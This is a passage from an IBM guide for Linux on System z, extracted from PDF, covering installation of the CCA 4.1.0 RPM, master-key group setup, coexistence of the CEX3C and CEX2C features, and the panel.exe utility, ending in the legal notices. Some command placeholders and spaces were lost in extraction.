+Java code sample +Groups in the RPM +These groups are created for the purpose of loading master keys. They are added during RPM installation +| as updates to /etc/groups. See Table161 on page 546. +v cca_admin +v cca_clrmk +v cca_lfmkp +v cca_cmkp +v cca_setmk +Install and configure the RPM +| Use the following steps to install and configure the CCA4.1.0 RPM. +1. Copy the RPM to the host where it will be installed. For example, /root/ on your host image. +2. Login to the host as root. Change to the directory where the RPM is located by issuing these +commands: + +cd /root/ +3. Install the RPM by issuing the following: +rpm -i +Notes: +a. If this is an upgrade you can use rpm -Uvh +b. If you are installing the RPM on a Novell SUSE distribution of Linux, it is possible that you might +receive the following warning messages because of an unsupported groupadd option. +groupadd: You are using an undocumented option (-f)! +groupadd: You are using an undocumented option (-f)! +groupadd: You are using an undocumented option (-f)! +groupadd: You are using an undocumented option (-f)! +groupadd: You are using an undocumented option (-f)! +No action on your part is needed. The installation proceeds with another call if this happens. +4. Reboot the host by issuing the following command: +shutdown -r now +AppendixJ.CCAinstallationinstructions 543 + +This is necessary because of the defaults added to /etc/profile.d/csulcca.sh and +/etc/profile.d/csulcca.csh for using CCAmust be propagated to all user login sessions. +5. Login to the host as root. Change to the directory where the RPM binaries are installed by issuing the +following command: + +cd /opt/IBM/CEX3C/bin/ +6. Verify that at least one card is present and active: +a. Ensure that the device driver is loaded by issuing the following command: +lsmod +You should see the module z90crypt loaded. If it is not loaded, verify the contents of the kernel +modules directory by issuing the following command: +ls /lib/modules//kernel/drivers/s390/crypto/ +You should see z90crypt.ko. If there is just z90crypt.ko then load it with the following: +modprobe z90crypt +Notes: +1) This works if you have only one domain assigned to the LPAR (or z/VM guest using a +dedicated CEX3C card). If more than one domain is available, you need the domain +parameter in the modprobe command to assign a domain (or use the lowest one). +2) Novell SUSE Linux uses its own start script, rcz90crypt, to do all the work. Settings can be +specified using YaST. +Note: If you do not see any of these kernel modules, or if there are any errors reported from the +call to modprobe, contact IBM Service. +b. When you are sure that the device driver is loaded, run one of the RPM-installed utilities to verify +accessibility by running the following command: +/opt/IBM/CEX3C/bin/ivp.e +This will health check all active cards. +/opt/IBM/CEX3C/bin/panel.exe -x +This will show the serial numbers and master key register states of all active cards running CCA +that are visible to this Linux host. The total number of active cards and any errors will also be +reported. +Notes: +1) To be able to use /opt/IBM/CEX3C/panel.exe the user must be either root or a member of the +'cca_admin' group (the owner of /usr/lib64/libcsulccamk.so). +2) If there is not at least one active card at this point, double check earlier steps and, if +necessary, involve IBM service because the rest of the setup is designed around having +active cards. +| 3) Unload of the device driver requires killing the catcher.exe program, and then restarting it +| when the driver is reloaded. See the note in “Installing and loading the cryptographic device +| driver” on page 537 for specific instructions. +7. Master key load - This procedure is for using the Linux on System z nativeAPI or the utility +(panel.exe) to load the master keys for the active cards. +If you want to use TKE instead, refer to a TKE manual, such as the IBM Redbooks® publication +Exploiting S/390 Hardware Cryptography with Trusted Key Entry for proper use.After completing this +step using the TKE procedure, go to Step 8 on page 547. +a. Setup the groups for the users who will be loading the master keys to the cards. Each part of the +load process is owned by a different Linux group created by the RPM install procedure, and +verified in the host library implementing theAPI allowing master key processing. To complete a +544 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +specific step the user must have membership in the proper group. There are a couple ways to +change group membership depending on your Linux distribution.Athird option is to create the +users specifically for these roles. +If a user does not have the proper group membership for a particular master key operation, the +error X'0008005a' is returned and an error message is printed to the system log. +Note: To be able to use /opt/IBM/CEX3C/panel.exe the user must be either root or a member of +the 'cca_admin' group (the owner of /usr/lib64/libcsulccamk.so). +1) Group membership for Red Hat (and Fedora) based Linux distributions +a) Use the 'groups' command to see a list of the user's current group membership: +groups +---output is + : + is a single-space separated list +b) must be passed along with the new group to the 'usermod' command as a +"comma" separated list, followed by the . For example, if you wanted to add +'cca_lfmkp' membership to user 'admin', you would use the following commands: +groups admin +---output: +admin : admin bin daemon sys wheel +usermod -G admin,bin,daemon,sys,wheel,cca_lfmkp admin +---output: +[none if successful] +Note: Ensure the user logs out and logs back in, otherwise the group membership in the +active session will not be updated. +2) Group membership for Novell SUSE-based Linux distributions: +a) Use the 'usermod' command to add membership for a specific group for a specific user. +For example, if you wanted to add 'cca_lfmkp' membership to user 'admin' you would use +the following commands +usermod -A cca_lfmkp admin +Note: Ensure the user logs out and logs back in, otherwise the group membership in the +active session will not be updated. +3) Create users for each role with correct group memberships (Same calls for Red Hat, Fedora, +and Novell SUSE) +a) Create user cca_user, which will own default key storage by issuing the following: +useradd -g cca_admin -d /home/cca_user -m cca_user +This creates the user with primary group cca_admin and a new home directory. +passwd cca_user +This sets the new user's password. +b) Create user cca_lfmkp by issuing the following: +useradd -g cca_admin -d /home/cca_lfmkp -G +cca_admin,cca_lfmkp -m cca_lfmkp +AppendixJ.CCAinstallationinstructions 545 + +This creates the user with primary group cca_admin, secondary group cca_lfmkp, and a +new home directory. +passwd cca_lfmkp +This sets the new user's password. +c) Create user cca_cmkp by issuing the following: +useradd -g cca_admin -d /home/cca_cmkp -G +cca_admin,cca_cmkp -m cca_cmkp +This creates the user with primary group cca_admin, secondary group cca_cmkp, and a +new home directory. +passwd cca_cmkp +This sets the new user's password. +d) Create user cca_clrmk by issuing the following: +useradd -g cca_admin -d /home/cca_clrmk -G +cca_admin,cca_clrmk -m cca_clrmk +This creates the user with primary group cca_admin, secondary group cca_clrmk, and a +new home directory. +passwd cca_clrmk +This sets the new user's password. +e) Create user cca_setmk +useradd -g cca_admin -d /home/cca_setmk -G +cca_admin,cca_setmk -m cca_setmk +This creates the user with primary group cca_admin, secondary group cca_setmk, and a +new home directory. +passwd cca_setmk +This sets the new user's password. +b. Add group membership privileges to users based on their required function. +Table161.CCAgroups +GroupName Description +cca_admin Alluserswhowillrunpartofthemasterkeyloadprocessmustbeinthisgroupbecausethelibrary +itselfisownedbyroot.cca_admin,withnopermissionsfor'world'asaprotectivemeasure. +Reasonsforthisseparategroupalsoincludeallowingoneownerof/usr/lib64/libcsulccamk.so, +andallowinguseofpanel.exewithoutallowinganyofthemasterkeyprocessingcalls. +cca_lfmkp TheusertoLOADthefirstkeypartmustbeinthisgroup. +cca_cmkp TheuserstoLOADthemiddleandlastkeypartsmustbeinthisgroup. +cca_clrmk Thenewmaster-keyregistercanbeCLEARedusingthesameMasterKeyProcesscallincasea +mistakewasmadeenteringakeypart(usethekeyverificationpatternstocheckforthis).To +performtheclear,theusermustbeamemberofthisgroup. +546 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Table161.CCAgroups (continued) +GroupName Description +cca_setmk TheusertocallSETafterthelastkeyparthasbeensuccessfullyloadedmustbeamemberofthis +Linuxgroup. +| c. Load FIRST, MIDDLE (optional), and LAST key parts for theAES, SYM,ASYM, andAPKAmaster +| keys and then call SET for each master key. This step can be done using the panel.exe utility +| provided or by writing your own application to call the Master Key Process (CSNBMKP) verb +| directly. The application must link with the correct library (installed to /usr/lib64/libcsulccamk.so +| by the RPM), and must be executed at each step by a user with the appropriate group +| memberships. The utility supports scripted as well as prompt-driven access. +| Repeat this step for each configured adapter. See “Changing the master key for two or more +| adapters that have the same master key, with shared CCAkey storage” on page 265. +| For details about panel.exe, see “The panel.exe utility” on page 553. +| Note: Loading master key parts modifies state information inside the card. For example you +| cannot load a 'FIRST' master key part twice in a row without clearing the new master-key +| register in between attempts. The same goes for setting the 'LAST' register.Any number of +| 'MIDDLE' parts can be loaded - with each call changing the contents of the new +| master-key register. Similarly a 'SET' operation changes the state of the 'new' register back +| to 'empty', while updating the 'current' register. +8. Key storage initialization - To perform this step, see “Using panel.exe for key storage initialization” +on page 555. See also “Dual Support: Key storage interactions” on page 551. +9. Key storage re-encipher when changing the master key - To perform this step, see “Using +panel.exe for key storage reencipher when changing the master key” on page 556. +10. If you are going to be using Central ProcessorAssist for Cryptographic Functions (CPACF), it must +be configured. See “CPACF support” on page 8. +Uninstall the RPM +| Use the following steps to uninstall the CCARelease 4.1.0 RPM: +| 1. Uninstall any RPMs that depend on the CCARPM. If you try to uninstall the CCARPM and dependent +| RPMs are still installed, the uninstall RPM command will fail and list the names of dependent RPMs. +| Therefore, you can skip to Step 2 and come back to this step if Step 2 fails for that reason. +2. Uninstall the CCARPM. +a. You have to use the full name. You can find the name by issuing the following command: +rpm -qa | grep csulcca +b. Login as root. You have to be root to uninstall the RPM. +c. Uninstall the RPM with the following command: +rpm -e +Notes: +a. If you created any users with one of the groups created by the RPM install as their primary (note +that the RPM install does NOT create any users, just groups) then the un-install process will not be +able to remove those groups. Just delete those users/groups yourself after uninstall or remove +such users before the uninstall of the RPM. This will remove any potential security holes. +b. Card master keys (and other state information) are untouched by the host-side uninstall of the +RPM. +c. Key storage files are not deleted by the uninstall.All default and nondefault key storage files will be +left as is. If you reinstall or install an upgraded package and load any new cards with the same +AppendixJ.CCAinstallationinstructions 547 + +master keys you will still be able to use your old key storage (old cards will still have the old keys, +see Step 7b on page 546 of “Install and configure the RPM” on page 543). +548 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| +Appendix K. Coexistence of CEX3C and CEX2C features +This appendix discusses trade-offs when configuring CEX2C features together with CEX3C features +available to the same Linux instance. +| These terms are used to describe CCARPMs, referring to several different versions: +|| CCA4.x CCA4.0.0, CCA4.1.0, and subsequent releases. +|| CCA3.x Any CCAversion 3 release. +Legacy support +| +| These are legacy support considerations. +| v The latest CCA4.x RPM will supersede and replace earlier RPMs if installed in the default manner. It is +| NOT recommended to manually alter installation in order to run newer versions of CCA4.x RPMs in +| parallel with older versions. This configuration is not supported. +| v Running the latest CCA4.x RPM in parallel with the IBM 3.x RPM and an IBM Crypto Express2 +| (CEX2C) feature in coprocessor mode configured to the same system image is a supported +| configuration. See “Concurrent installations.” +| v CCA4.x RPMs include support for interaction with the CEX2C feature in coprocessor mode. See “Dual +| Support: TKE catcher can run in only one instance” on page 552. +Concurrent installations +| +| These are background considerations for installation of the CEX3C and CEX2C RPM alongside the +| previously released RPM for the CEX2C. +| 1. The libcsulcca.so and libcsulsapi.so libraries for CCA4.x and CCA3.x have many symbols with the +| same names.An application cannot deterministically link with both libraries. The first library in the link +| statement is what will be used for all symbols that can be resolved there, after that the second library +| will be examined.At this point, either the linker will not allow link to continue, by throwing an error on +| the duplicate symbols, or will produce a hybrid-linked application. Either case will give the user the +| wrong answer. +| Anew or updated library cannot itself resolve this kind of conflict because: +| v There is no way to have a default set of symbols or card support in an updated host library. The link +| operation is a fundamental step in building the customer application and outside the control of the +| library or library installation process. +| v One way to resolve name collisions is to change all of the function names in the new library. +| However, this would have greatly impacted the customer's ability to port applications forward, and +| this option was rejected. +| 2. The key storage environment variables in the default user profile (/etc/profile.d/csulcca.sh and +| /etc/profile.d/csulcca.csh) are changed at installation time to point to the /opt/IBM/CEX3C/keys/ +| path, where before the path contained /*/4764/*. There is one set of environment variables for a profile. +| The user can overcome this by setting a local profile in their home profile file that sets the environment +| variables back to the 4764 version. See “Dual Support: Key storage interactions” on page 551. +| 3. See “Interaction between the 'default card' and use of Protected Key CPACF” on page 11 for a +| concurrency and CPACF. +| CEX3C and CEX2C co-installation toleration +| The CCA4.x RPMs all support accessing the CEX2C feature as well as the CEX3C feature, with the first +| CEX3C becoming the 'default' adapter. This can be changed using environment variables. See +| “Environment variables that affect CPACF usage” on page 8. Using CCA4.x is your best option for +| accessing a CEX2C feature as well as a CEX3C feature going forward, even in a CEX2C-only installation. +©CopyrightIBMCorp.2007,2011 549 + +| Installing the csulcca RPM over an existing xcryptolinz RPM: During installation the new csulcca +| RPM will look for and rearrange the xcryptolinz RPM pieces that conflict with the new RPM. These consist +| of a few soft links and some profile settings. +| Your old key storage will not be accessed, deleted or modified; it will also not be migrated.As long as the +| appropriate master keys are set in the CEX3C to be the same as the equivalent master keys in the +| CEX2C, the old key storage can be simply used by the new host library. There is a set of environment +| variables that control where key storage is found. See “Environment variables for the key storage file” on +| page 262. +| The csulcca RPM does not replace the xcryptolinz RPM, the csulcca RPM will live alongside it, in order to +| ease the transition process. +| Temporary toleration approach to avoid re-linking applications: Because the new RPM has a new +| name for the CCAhost library, it is necessary to re-link your application with the new library. There is a +| quick method for toleration if this is not immediately possible. Create soft links in /usr/lib64/ from the +| new libraries to the names of the libraries that existed before: +| 1. IMPORTANT Delete or move the old libraries first. +| 2. Create a soft link of libcsulcca.so.4.1.0 or libcsulcca.so.4.0.0 to libcsulsapi.so, libcsulsecy.so, +| libds30.so and libcsulcall. +| 3. Create a soft link of libcsulccamk.so.4.1.0 or libcsulccamk.so.4.0.0 to libcsulmkapi.so +| 4. Run the ldconfig command. +| Uninstalling the xcryptolinz RPM: This task is not impacted by the changes the csulcca RPM makes +| when it is installed. +| Re-installing the xcryptolinz RPM with the csulcca RPM installed: +| +| IMPORTANT +| This is not a supported operation. The csulcca RPM cannot detect this scenario to try to recover the +|| csulcca package function. +| +| +| Difficulties noted above for the coexistence scenario make supporting consistent operation of the csulcca +| RPM while allowing reinstall of the xcryptolinz RPM impossible. The xcryptolinz RPM install will create +| TKE daemon soft links pointing to the old TKE daemon (which cannot communicate with CEX3C adapters) +| and corrupt the standard profile settings updated for the csulcca install. +| If a refresh of the xcryptolinz RPM is truly needed, choose one of these three methods: +| 1. By uninstalling and installing: +| a. Uninstall the csulcca RPM first, in order to have a clean system image. The key storage file will be +| left intact. +| b. Install the xcryptolinz RPM. +| c. Reinstall the csulcca RPM so that the updated function is back in place. +| 2. By using tools and copying files: +| a. Use the rpm2cpio and cpio tools to extract only the files needed from the xcryptolinz RPM. +| b. Copy the needed files into place manually. +| 3. By using soft links and environment variables: +| a. Create the soft links from the new RPM host libraries to the old library names. See “Temporary +| toleration approach to avoid re-linking applications.” +| b. Point the new RPM host library at your old key storage file using the environment variables, which +| can be done on a per-process basis. +550 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| See “Environment variables for the key storage file” on page 262 for a discussion about the environment +| variables that are used to specify the name of the key storage files. +| Fixing the csulcca RPM install after installing xcryptolinzGAon top of it: It is possible to simply +| recover the csulcca RPM install state with these two procedures. It is recommended that you subsequently +| reboot the system image. Perform these steps (as root): +| 1. Run this command: +| /opt/IBM/CEX3C/bin/profile.perl delete +| This will remove the environment variables added to /etc/profile by the xcryptolinzGARPM. If you +| need those variables set in a particular application space, set them in startup scripts for the application +| that needs them. Because these variables are positioned at the end of /etc/profile, they disable the +| csulcca RPM configuration. +| 2. Delete startup file links by issuing these commands: +| rm -f /etc/init.d/rc2.d/S16TKEcat +| rm -f /etc/init.d/rc3.d/S16TKEcat +| rm -f /etc/init.d/rc5.d/S16TKEcat +| These startup files cause the wrong TKE catcher daemon to be loaded, which cannot communicate +| with CEX3C adapters. The new TKE catcher daemon can work with both CEX2C and CEX3C +| adapters, so it is preferred for all systems with co-install of the xcryptolinzGARPM and the csulcca +| RPM. +| Caveats: +| v Be very careful with setting Master Keys and allowing other accesses. The older libraries will not detect +| the difference between a CEX2C and a CEX3C, and will attempt to access the new cards if allocated by +| the user. +| v It is best to use a concurrent environment as a temporary aid to a porting effort, the result of which is +| an application that can use the card it desires allocated through the new CEX*C library. +Dual Support: Key storage interactions +| +| The following factors together should be considered, and managed carefully for user installations: +| v In all the CCA4.x RPMs, the environment variables described in “Environment variables for the key +| storage file” on page 262 have the same names. The purpose is to ease application porting efforts. +| v The recommended method to accomplish coexistence of the two CCApackages for porting or debug +| environments is the installation of the CCA4.x RPMs on top of an existing xcryptolinz RPM installation. +| This installation will change how the environment variables are defined for any user performing login +| after the CCA4.x RPM installation, such that the environment variables will point to the new location. +| v Therefore, legacy applications that have not defined their own key storage environments (those using +| the default profile location) will now be using the new key storage file defined for the CCA4.x RPMs. +| These are likely consequences the next time that the legacy application starts: +| – The legacy application will not be able to find its existing keys. +| – The legacy application may corrupt key storage for applications using the new CCA4.x RPM location +| for key storage. +| Solution +| The application developer should ensure that legacy applications are started using the definitions for the +| key storage environment variables that they require. +| v The environment variables were placed in file /etc/profile by the xcryptolinz RPM installation (look for +| the LINZCRYPT section). They were defined as follows: +| – CSUDESLD=/opt/IBM/4764/keys/deslist +| – CSUDESDS=/opt/IBM/4764/keys/des.key +| – CSUPKALD=/opt/IBM/4764/keys/pkalist +| – CSUPKADS=/opt/IBM/4764/keys/pka.key +AppendixK.CoexistenceofCEX3CandCEX2Cfeatures 551 + +| – LD_LIBRARY_PATH=/usr/lib64 +| – CNM_CLASSPATH=/opt/IBM/CEX3C/cnm/ +| – CSUSRDI=$HOME/srdidata +| v There are several ways to ensure that your application is started with these environment variables +| instead of the defaults. One straightforward way is to complete the following steps: +| 1. Manually export the definitions using the command export. +| 2. Check that they are set correctly using the commands: env or printenv. +| 3. Manually start the application that needs the special environment. +| You can useAES key storage functions with a CEX2C feature only if you have installed the CCA4.* +| RPMs. This is because the environment variables CSUAESLD and CSUAESDS are necessary forAES +| key storage, but they did not ship with the CCA3.* RPMs. These environment variables are defined as +| follows: +| v CSUAESLD=/opt/IBM/CEX3C/keys/aeslist +| v CSUAESDS=/opt/IBM/CEX3C/keys/aes.key +Dual Support: TKE catcher can run in only one instance +| +| The Trusted Key Entry (TKE) catcher daemon is used to interface with the TKE workstation. This daemon +| listens on a single port for management communication. This port number has not changed for the CEX3C +| release. Therefore, the new daemon supports TKE management communication to both the CEX2C and +| CEX3C adapters. Special steps are taken in the install/uninstall and daemon management for the CEX3C +| release to ensure that the new daemon is running when it is available. +| You must have a TKE V6.0 or higher workstation in order to see supported CEX3Cs. They are not seen +| when using TKE V5 workstations. For more information about the TKE workstation, see z/OS +| Cryptographic Services ICSF: Trusted Key Entry PCIX Workstation User’s Guide. +552 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Appendix L. Utilities +This appendix describes two utilities used in this document: +ivp.e +This utility is used to verify installation, when run without arguments. +This utility can also be used to tell you whether your cards are CEX3C or CEX2C, by calling the +Cryptographic Facility Query verb for all available adapters. +panel.exe +This utility provides a Linux native mechanism for administering and initializing certain characteristics +of active cryptographic coprocessors. It is intended as a basic administration tool for Linux-only IBM +System z configurations, where a Trusted Key Entry (TKE) solution is not available. +For mixed z/OS and Linux configurations, it is recommended that administration be accomplished +using the z/OS TSO panels as described in the z/OS ICSFAdministrator's Guide. The utility is +installed by the Linux for System z Cryptographic Coprocessor install package or RPM to this path in +the Linux system: +/opt/IBM/CEX3C/bin/panel.exe +The panel.exe utility +The panel.exe utility is installed by the Linux for IBM System z Cryptographic Coprocessor install package +or RPM to this path in the Linux system: +/opt/IBM/CEX3C/bin/panel.exe +| The panel.exe utility numbers cards from card0 to card63, while verbs such as Cryptographic Resource +| Allocate number cards from CRP01 to CRP64, and therefore card0 corresponds to CRP01, card1 +| corresponds to CRP02, and so forth. +panel.exe syntax +Precise usage information can be obtained by running the panel.exe utility with no arguments on the Linux +shell command line. This is an example output: +| Panel usage ([-k,-a ,-o,-g][-?,-x,-m,-l,-s,-c,-q,-t,-f,-i,-r,-p,-n] +| >> [CC] Arg >> arg must precede non-[CC] args +| [CC] -k: Can TKE administer a card? +| [CC] -a : use non-default card +| is the card number [0 - 63] +| [CC] -o: Disable output to stdout: +| [CC] -g : Set the log level: +| can be NONE, TRANSACTIONS, NONZERO, +| ALL, DEBUG, and FUNCTIONS +| +| >> non-[CC] Args >>: (all are mutually exclusive) +| +| +| ---BASIC ADMIN--- +| +| -? , -h: Usage +| +| -x: List crypto resources (and basic status) +| -m: List CPACF (local CPU crypto) resources +| +| ---MASTER KEY (MK)--- +| +| To LOAD a Master Key (MK) PART: +| -l (for interactive) +| OR====> +| -l -t [A|S|E|P] -p [F|M|L] KEYPART +©CopyrightIBMCorp.2007,2011 553 + +| where: -t [A|S|E|P] is which MK: A=ASYM, S=SYM, E=AES P=APKA +| where: -p [F|M|L] is the part: F=FIRST, M=MIDDLE, L=LAST +| where: KEYPART is string in hex 2* size of key +| (recall: 2 text chars = 1 binary Byte) +| To SET a Master Key: +| -s (for interactive) +| OR====> +| -s -t [A|S|E|P] +| where: -t [A|S|E|P] is which MK: A=ASYM, S=SYM, E=AES P=APKA +| To CLEAR a Master Key ’New’ Register: +| -c (for interactive) +| OR====> +| -c -t [A|S|E|P] +| where: -t [A|S|E|P] is which MK: A=ASYM, S=SYM, E=AES P=APKA +| To QUERY a Master Key Verification Pattern: +| -q (for interactive) +| OR====> +| -q -t [A|S|E|P] -r [N|C|O] +| where: -t [A|S|E|P] is which MK: A=ASYM, S=SYM, E=AES P=APKA +| where: -r [N|C|O] is which register: N=NEW, C=CURRENT, O=OLD +| ---KEY STORAGE--- +| +| To INIT a KEY STORAGE file: +| -t -f -i +| To REENCipher KEY STORAGE: +| -t -f -r +| To LIST a KEY STORAGE: +| -t -f -p +| where: +| can be AES , DES , PKA +| is the fully qualified name of a key storage file +| +| ---RETAINED KEYS--- +| +| To LIST RETAINED KEYS (this domain ONLY): +| -n +Note: For security reasons, only a root user (real user id equal to '0') is allowed to use panel.exe to load +master key parts or to clear previously loaded master key parts. This is enforced at the shared +library level in the implementation of the Master Key Process verb, not in the utility itself. +Additionally, only the user who created a set of key storage files or the 'root' user will be able to +take actions with respect to those key storage files, based on Linux file system permissions. +panel.exe functions +The panel.exe utility can be used to: +v Determine if a TKE is currently able to administer a specific active coprocessor +v List the labels and key types for all the keys in a designated key storage file. +v List the labels for all of the retained keys (RSAprivate keys stored in the adapter) in the current domain +of the CEX*C. +v List the coprocessors currently active in the Linux system and their master key status +v Load master key parts to the coprocessor +v Set a master key that was loaded to the coprocessor. Note that panel.exe, is not designed to change +the master keys for all the cards in a group; this is a more sophisticated operation. +v Clear master key parts which were previously loaded to the coprocessor but not yet 'set' or confirmed +(used for when a mistake in entering master key parts has been detected) +v List serial numbers and master key register states of all active cards running CCAthat are visible to this +Linux host. The total number of active cards and any errors will also be reported. +v Query the master key verification pattern for any master-key register in the current domain +v Initialize a local host key storage file. See “Using panel.exe for key storage initialization” on page 555. +554 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +v Re-encipher a local host key storage file (use this when the master key has been changed to ensure +currency with key storage). See “Using panel.exe for key storage reencipher when changing the master +key” on page 556. +v List available CPACF functions, and whether they are supported in the current system image. +The panel.exe utility does not support access control point manipulation or more sophisticated +administration. Refer to “Trusted Key Entry support” on page 38 for that functionality. +Using panel.exe for key storage initialization +Each application using CCAtypically creates key objects that are stored in the host, protected by the +master key stored inside the card. Perform these steps for key storage initialization. +1. The default locations for the files are setup by the RPM in environment variables added in the new +profile files /etc/profile.d/csulcca.sh and /etc/profile.d/csulcca.csh during installation. Key +storage is unsupported without a master key loaded, so Master key load (Step 7 on page 544) must +be completed before this step. The utility panel.exe can be used to initialize both the default key +storage and any separate key storage you might want to set up. The full topic is too lengthy for this +explanation (see the key storage discussions elsewhere in this manual, including the verb “Key +Storage Initialization (CSNBKSI)” on page 90). In brief, an application can specify a particular key +storage location. That nondefault key storage can be initialized now (or later) by using panel.exe or +with a program using the Key Storage Initialization verb. +For details about panel.exe, see “The panel.exe utility” on page 553. +If you are planning to use both the CEX2C and CEX3C in the same environment, see the information +about the key storage environment variable in “Concurrent installations” on page 549. +2. The key storage environment variables in the default user profile (/etc/profile.d/csulcca.sh) are +changed at installation time to point to the /opt/IBM/CEX3C/keys/ path, where before the path +contained /*/4764/*. There is one set of environment variables for a profile. The user can override this +by setting a local profile in their home profile file that sets the environment variables back to the 4764 +version. +3. Key storage ownership +The default key storage files are actually partially created (but not fully initialized) during the master +key load process. This means the ownership and permissions of those files might have to be changed +for them to be fully initialized by the user associated with the application that will use the key storage +files. +Because of the mutually exclusive nature of the master key admin groups, there can be some +harmless access errors reported to the system log during master key load. The example users created +previously in Master key load Step 7a3 on page 545 will avoid this and not need to fix key storage +ownership because they were all created with the primary group set to 'cca_admin' (the -g argument to +useradd). By doing this, the first master key load creates the key storage files with group set to +'cca_admin' and subsequent users all have membership in that group. You still might want to fix the +owner of default key storage at the end to be 'root', but the group membership solves the access +issue. +Typically 'root' will need to fix the ownership and permissions. We recommend that the owner of key +storage be 'root', and that the group be 'cca_admin' ('cca_admin' group is created during the RPM +install process). We recommend that the permissions be set to 660, which is rw for owner (root), rw for +group (cca_admin), and for 'everyone', for security. Then add the application user to the group +'cca_admin' with the appropriate procedure detailed in Master key load Step 7a on page 544. +RECALL: To be able to use /opt/IBM/CEX3C/panel.exe the user must be either root OR a member of +the 'cca_admin' group (the owner.group of /usr/lib64/libcsulccamk.so). The reasons for the separate +'cca_admin' group are to allow one owner of /usr/lib64/libcsulccamk.so, and to allow use of the +executable without allowing any of the master key processing calls. +4. Key storage initialization with panel.exe (default) +AppendixL.Utilities 555 + +a. Ensure permissions to the default location (/opt/IBM/CEX3C/keys/) allow your user to perform this +operation. +b. Initialize key storage (DES is where DES key tokens will be kept,AES is whereAES key tokens +will be kept, PKAis for all the RSApublic/private internal key tokens, andAPKAis forAPKAkey +tokens). +/opt/IBM/CEX3C/bin/panel.exe -t AES -i +/opt/IBM/CEX3C/bin/panel.exe -t DES -i +/opt/IBM/CEX3C/bin/panel.exe -t PKA -i +5. Key storage initialization with panel.exe (non-default) +a. Ensure that you are using the account that will use the key storage. If you are not, you will have to +fix its ownership and permissions later. +b. Initialize both types of key storage (DES is where DES key tokens will be kept,AES is whereAES +key tokens will be kept, PKAis for all the RSApublic/private internal key tokens). Use a different +name forAES, DES, and PKA, because the second initialization would overwrite the first if different +names are not used. The file name passed is expected to be the full or relative path and will +actually be the core of the filename, because more than one file is created using the stem you +provide. To initializeAES, DES and PKAstorage, use the following commands: +/opt/IBM/CEX3C/bin/panel.exe -t AES -f -i +/opt/IBM/CEX3C/bin/panel.exe -t DES -f -i +/opt/IBM/CEX3C/bin/panel.exe -t PKA -f -i +For example, if you entered the following commands: +/opt/IBM/CEX3C/bin/panel.exe -t AES -f /tmp/a -i +/opt/IBM/CEX3C/bin/panel.exe -t DES -f /tmp/d -i +/opt/IBM/CEX3C/bin/panel.exe -t PKA -f /tmp/p -i +These files would be created: +/tmp/a +/tmp/a.NDX +/tmp/d +/tmp/d.NDX +/tmp/p +/tmp/p.NDX +Using panel.exe for key storage reencipher when changing the master +key +Because all the key tokens are protected by the master key for the domain, a preexisting key storage must +be re-enciphered when the master key is changed. If the example group scheme is used this is very +simple because the key storage files will be owned by the group 'cca_admin' and the user making the +reencipher call will also be in group 'cca_admin'. If this is not the case then, after changing the master key, +the owner of key storage will need to log in and drive the reencipher. This can be done programmatically +(using several verbs) or with /opt/IBM/CEX3C/panel.exe. Of course, as noted, the user of panel.exe must +also be a member of 'cca_admin' because of ownership of /usr/lib64/libcsulccamk.so. +Perform these steps for key storage reencipher when changing the master key. +1. To re-encipher default key storage with panel.exe use: +/opt/IBM/CEX3C/bin/panel.exe -t AES -r +/opt/IBM/CEX3C/bin/panel.exe -t DES -r +/opt/IBM/CEX3C/bin/panel.exe -t PKA -r +2. To reencipher non-default key storage with panel.exe use: +556 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +/opt/IBM/CEX3C/bin/panel.exe -t AES -f -r +/opt/IBM/CEX3C/bin/panel.exe -t DES -f -r +/opt/IBM/CEX3C/bin/panel.exe -t PKA -f -r +AppendixL.Utilities 557 + +558 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Accessibility +Accessibility features help users who have a disability, such as restricted mobility or limited vision, to use +information technology products successfully. +Documentation accessibility +The Linux on System z publications are inAdobe Portable Document Format (PDF) and should be +compliant with accessibility standards. If you experience difficulties when you use the PDF file and want to +request a Web-based format for this publication, use the Reader Comment Form in the back of this +publication, send an email to eservdoc@de.ibm.com, or write to: +IBM Deutschland Research & Development GmbH +Information Development +Department 3248 +Schoenaicher Strasse 220 +71032 Boeblingen +Germany +In the request, be sure to include the publication number and title. +When you send information to IBM, you grant IBM a nonexclusive right to use or distribute the information +in any way it believes appropriate without incurring any obligation to you. +IBM and accessibility +See the IBM HumanAbility andAccessibility Center for more information about the commitment that IBM +has to accessibility at +www.ibm.com/able +©CopyrightIBMCorp.2007,2011 559 + +560 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Notices +This information was developed for products and services offered in the U.S.A. +IBM may not offer the products, services, or features discussed in this document in other countries. +Consult your local IBM representative for information on the products and services currently available in +your area.Any reference to an IBM product, program, or service is not intended to state or imply that only +that IBM product, program, or service may be used.Any functionally equivalent product, program, or +service that does not infringe any IBM intellectual property right may be used instead. However, it is the +user's responsibility to evaluate and verify the operation of any non-IBM product, program, or service. +IBM may have patents or pending patent applications covering subject matter described in this document. +The furnishing of this document does not give you any license to these patents. You can send license +inquiries, in writing, to: +IBM Director of Licensing +IBM Corporation +North Castle Drive +Armonk, NY 10504-1785 +USA +For license inquiries regarding double-byte character set (DBCS) information, contact the IBM Intellectual +Property Department in your country or send inquiries, in writing, to: +IBM World TradeAsia Corporation +Intellectual Property Licensing +Legal and Intellectual Property Law +IBM Japan Ltd. +1623-14, Shimotsuruma, Yamato-shi +Kanagawa 242-8502 Japan +The following paragraph does not apply to the United Kingdom or any other country where such +provisions are inconsistent with local law: INTERNATIONALBUSINESS MACHINES CORPORATION +PROVIDES THIS PUBLICATION “AS IS” WITHOUT WARRANTY OFANY KIND, EITHER EXPRESS OR +IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON-INFRINGEMENT, +MERCHANTABILITY OR FITNESS FORAPARTICULAR PURPOSE. Some states do not allow disclaimer +of express or implied warranties in certain transactions, therefore, this statement may not apply to you. +This 